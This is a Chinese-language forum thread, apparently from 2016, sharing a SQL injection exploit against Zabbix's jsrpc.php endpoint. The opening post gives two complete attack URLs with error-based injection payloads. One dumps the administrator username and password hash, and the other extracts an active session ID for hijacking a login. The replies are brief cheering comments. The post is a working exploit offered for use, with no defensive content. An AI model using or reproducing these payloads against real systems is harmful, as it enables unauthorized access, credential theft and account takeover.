Zabbix最新SQL注射漏洞利用

admin · 发表于 2016-8-18 09:56:29

漏洞测试：

爆用户名和密码：

http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(alias,0x7e,passwd,0x7e) from users limit 1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

复制代码

爆sessionid（可替换刷新登陆）

http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

复制代码

huangweitest · 发表于 2016-8-18 10:09:56

好贴，前排留名

草莓 · 发表于 2016-8-18 10:10:52

真是速度快啊

显示全部楼层 · 发表于 2016-8-18 10:14:42

只为POC而来

jiabobb · 发表于 2016-8-18 10:19:28

我带着灌水大军来了

hackjiabo · 发表于 2016-8-18 14:17:15

我是来学习的